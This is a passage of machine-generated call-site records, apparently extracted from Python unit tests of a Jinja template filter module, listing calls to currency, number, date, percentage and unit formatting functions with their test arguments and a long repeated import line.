format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((42, 25, 42, 56), 'app.jinja_filters.format_currency_for_input', 'format_currency_for_input', ({(42, 51, 42, 55): 'None'}, {}), '(None)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((47, 25, 47, 51), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(47, 45, 47, 50): '"""GBP"""'}, {}), "('GBP')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, 
get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((48, 25, 48, 51), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(48, 45, 48, 50): '"""EUR"""'}, {}), "('EUR')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((49, 25, 49, 51), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(49, 45, 49, 50): '"""USD"""'}, {}), "('USD')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((50, 25, 50, 51), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(50, 45, 50, 50): '"""JPY"""'}, {}), "('JPY')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((51, 25, 51, 48), 'app.jinja_filters.get_currency_symbol', 'get_currency_symbol', ({(51, 45, 51, 47): '""""""'}, {}), "('')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, 
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((55, 25, 55, 78), 'app.jinja_filters.format_currency', 'format_currency', ({(55, 41, 55, 64): 'self.autoescape_context', (55, 66, 55, 70): '"""11"""', (55, 72, 55, 77): '"""GBP"""'}, {}), "(self.autoescape_context, '11', 'GBP')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((56, 25, 56, 81), 'app.jinja_filters.format_currency', 'format_currency', ({(56, 41, 56, 64): 'self.autoescape_context', (56, 66, 56, 73): '"""11.99"""', (56, 75, 56, 80): '"""GBP"""'}, {}), "(self.autoescape_context, '11.99', 'GBP')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((57, 25, 57, 81), 'app.jinja_filters.format_currency', 'format_currency', ({(57, 41, 57, 64): 'self.autoescape_context', (57, 66, 57, 73): '"""11000"""', (57, 75, 57, 80): '"""USD"""'}, {}), "(self.autoescape_context, '11000', 'USD')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((58, 25, 58, 68), 'app.jinja_filters.format_currency', 'format_currency', ({(58, 41, 58, 64): 'self.autoescape_context', (58, 66, 58, 67): '(0)'}, {}), '(self.autoescape_context, 0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, 
format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((59, 25, 59, 71), 'app.jinja_filters.format_currency', 'format_currency', ({(59, 41, 59, 64): 'self.autoescape_context', (59, 66, 59, 70): '(0.0)'}, {}), '(self.autoescape_context, 0.0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((60, 25, 60, 71), 'app.jinja_filters.format_currency', 'format_currency', ({(60, 41, 60, 64): 'self.autoescape_context', (60, 66, 60, 68): '""""""'}, {}), "(self.autoescape_context, '')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((61, 25, 61, 71), 'app.jinja_filters.format_currency', 'format_currency', ({(61, 41, 61, 64): 'self.autoescape_context', (61, 66, 61, 70): 'None'}, {}), '(self.autoescape_context, None)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((66, 25, 66, 43), 'app.jinja_filters.format_number', 'format_number', ({(66, 39, 66, 42): '(123)'}, {}), '(123)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, 
format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((67, 25, 67, 47), 'app.jinja_filters.format_number', 'format_number', ({(67, 39, 67, 46): '"""123.4"""'}, {}), "('123.4')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((68, 25, 68, 48), 'app.jinja_filters.format_number', 'format_number', ({(68, 39, 68, 47): '"""123.40"""'}, {}), "('123.40')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((69, 25, 69, 46), 'app.jinja_filters.format_number', 'format_number', ({(69, 39, 69, 45): '"""1000"""'}, {}), "('1000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((70, 25, 70, 47), 'app.jinja_filters.format_number', 'format_number', ({(70, 39, 70, 46): '"""10000"""'}, {}), "('10000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, 
min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((71, 25, 71, 51), 'app.jinja_filters.format_number', 'format_number', ({(71, 39, 71, 50): '"""100000000"""'}, {}), "('100000000')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((72, 25, 72, 41), 'app.jinja_filters.format_number', 'format_number', ({(72, 39, 72, 40): '(0)'}, {}), '(0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((73, 25, 73, 44), 'app.jinja_filters.format_number', 'format_number', ({(73, 39, 73, 43): '(0.0)'}, {}), '(0.0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((74, 25, 74, 42), 'app.jinja_filters.format_number', 'format_number', ({(74, 39, 74, 41): '""""""'}, {}), "('')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, 
format_repeating_summary, format_address_list\n'), ((75, 25, 75, 44), 'app.jinja_filters.format_number', 'format_number', ({(75, 39, 75, 43): 'None'}, {}), '(None)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((142, 27, 142, 69), 'app.jinja_filters.format_date', 'format_date', ({(142, 39, 142, 62): 'self.autoescape_context', (142, 64, 142, 68): 'date'}, {}), '(self.autoescape_context, date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((153, 27, 153, 69), 'app.jinja_filters.format_date', 'format_date', ({(153, 39, 153, 62): 'self.autoescape_context', (153, 64, 153, 68): 'date'}, {}), '(self.autoescape_context, date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((160, 16, 160, 33), 'jinja2.Markup', 'Markup', ({(160, 23, 160, 32): '"""2017-01"""'}, {}), "('2017-01')", False, 'from jinja2 import Undefined, Markup\n'), ((164, 27, 164, 69), 'app.jinja_filters.format_date', 'format_date', ({(164, 39, 164, 62): 'self.autoescape_context', (164, 64, 164, 68): 'date'}, {}), '(self.autoescape_context, date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, 
min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((195, 27, 195, 78), 'app.jinja_filters.format_datetime', 'format_datetime', ({(195, 43, 195, 66): 'self.autoescape_context', (195, 68, 195, 77): 'date_time'}, {}), '(self.autoescape_context, date_time)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((206, 27, 206, 78), 'app.jinja_filters.format_datetime', 'format_datetime', ({(206, 43, 206, 66): 'self.autoescape_context', (206, 68, 206, 77): 'date_time'}, {}), '(self.autoescape_context, date_time)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((231, 12, 231, 72), 'app.jinja_filters.format_conditional_date', 'format_conditional_date', ({(231, 36, 231, 59): 'self.autoescape_context', (231, 61, 231, 65): 'None', (231, 67, 231, 71): 'None'}, {}), '(self.autoescape_context, None, None)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((255, 13, 255, 68), 'unittest.mock.patch', 'patch', (), '', False, 'from unittest.mock import patch\n'), ((280, 12, 280, 58), 'app.jinja_filters.calculate_years_difference', 'calculate_years_difference', ({(280, 39, 280, 43): 'None', (280, 45, 280, 57): '"""2017-01-17"""'}, {}), "(None, '2017-01-17')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, 
format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((292, 27, 292, 91), 'app.jinja_filters.format_date_range', 'format_date_range', ({(292, 45, 292, 68): 'self.autoescape_context', (292, 70, 292, 80): 'start_date', (292, 82, 292, 90): 'end_date'}, {}), '(self.autoescape_context, start_date, end_date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((303, 27, 303, 81), 'app.jinja_filters.format_date_range', 'format_date_range', ({(303, 45, 303, 68): 'self.autoescape_context', (303, 70, 303, 80): 'start_date'}, {}), '(self.autoescape_context, start_date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((400, 16, 400, 27), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((400, 29, 400, 40), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((444, 25, 444, 49), 'app.jinja_filters.format_percentage', 'format_percentage', ({(444, 43, 444, 48): '"""100"""'}, {}), "('100')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), 
((445, 25, 445, 47), 'app.jinja_filters.format_percentage', 'format_percentage', ({(445, 43, 445, 46): '(100)'}, {}), '(100)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((446, 25, 446, 47), 'app.jinja_filters.format_percentage', 'format_percentage', ({(446, 43, 446, 46): '(4.5)'}, {}), '(4.5)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((449, 25, 449, 62), 'app.jinja_filters.format_number_to_alphabetic_letter', 'format_number_to_alphabetic_letter', ({(449, 60, 449, 61): '(0)'}, {}), '(0)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((450, 25, 450, 62), 'app.jinja_filters.format_number_to_alphabetic_letter', 'format_number_to_alphabetic_letter', ({(450, 60, 450, 61): '(4)'}, {}), '(4)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((451, 25, 451, 63), 'app.jinja_filters.format_number_to_alphabetic_letter', 
'format_number_to_alphabetic_letter', ({(451, 60, 451, 62): '(25)'}, {}), '(25)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((452, 25, 452, 63), 'app.jinja_filters.format_number_to_alphabetic_letter', 'format_number_to_alphabetic_letter', ({(452, 60, 452, 62): '(-1)'}, {}), '(-1)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((456, 25, 456, 57), 'app.jinja_filters.format_unit', 'format_unit', ({(456, 37, 456, 51): '"""length-meter"""', (456, 53, 456, 56): '(100)'}, {}), "('length-meter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((457, 25, 457, 62), 'app.jinja_filters.format_unit', 'format_unit', ({(457, 37, 457, 56): '"""length-centimeter"""', (457, 58, 457, 61): '(100)'}, {}), "('length-centimeter', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((458, 25, 458, 56), 'app.jinja_filters.format_unit', 
'format_unit', ({(458, 37, 458, 50): '"""length-mile"""', (458, 52, 458, 55): '(100)'}, {}), "('length-mile', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((459, 25, 459, 61), 'app.jinja_filters.format_unit', 'format_unit', ({(459, 37, 459, 55): '"""length-kilometer"""', (459, 57, 459, 60): '(100)'}, {}), "('length-kilometer', 100)", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, 